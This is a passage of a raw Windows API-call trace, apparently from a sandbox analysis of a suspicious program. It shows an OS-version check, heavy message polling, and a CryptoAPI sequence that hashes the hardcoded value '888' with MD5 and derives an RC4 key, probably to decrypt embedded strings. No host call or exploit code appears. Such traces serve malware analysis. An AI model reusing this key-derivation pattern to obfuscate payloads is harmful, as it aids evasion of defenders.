hHeap=0x2af0000) returned 1 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.168] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.168] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0149.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0149.168] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.168] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.168] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.168] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.168] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.168] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0149.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0149.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f70e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0149.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0149.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ea0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0149.169] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf110) returned 1 [0149.169] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.169] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.169] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0149.169] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.170] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0149.170] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.170] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.170] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.170] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.170] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.182] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.182] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.182] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.182] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0149.182] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.182] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.182] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0149.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.182] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0149.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.182] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.183] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.183] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.183] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.183] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.183] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.183] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.183] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.183] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.183] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.184] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.184] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.184] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.184] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.184] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0149.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaa2a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0149.184] CryptCreateHash (in: hProv=0x9bf110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0149.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719e8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.184] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0149.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0149.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a48, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0149.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.185] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.185] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.185] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0149.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaa4b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0149.185] CryptHashData (hHash=0x9e20b8, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0149.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.185] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.185] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.185] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.186] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0149.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.186] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0149.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.186] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.186] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0149.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaa468, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0149.186] CryptDeriveKey (in: hProv=0x9bf110, Algid=0x6601, hBaseData=0x9e20b8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e20f8) returned 1 [0149.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.187] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.187] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.187] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.187] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.187] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.187] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0149.187] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0149.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7040, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0149.187] CryptDestroyHash (hHash=0x9e20b8) returned 1 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7720 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0149.187] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0149.188] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0149.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.188] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0149.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.188] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.188] PeekMessageW (in: 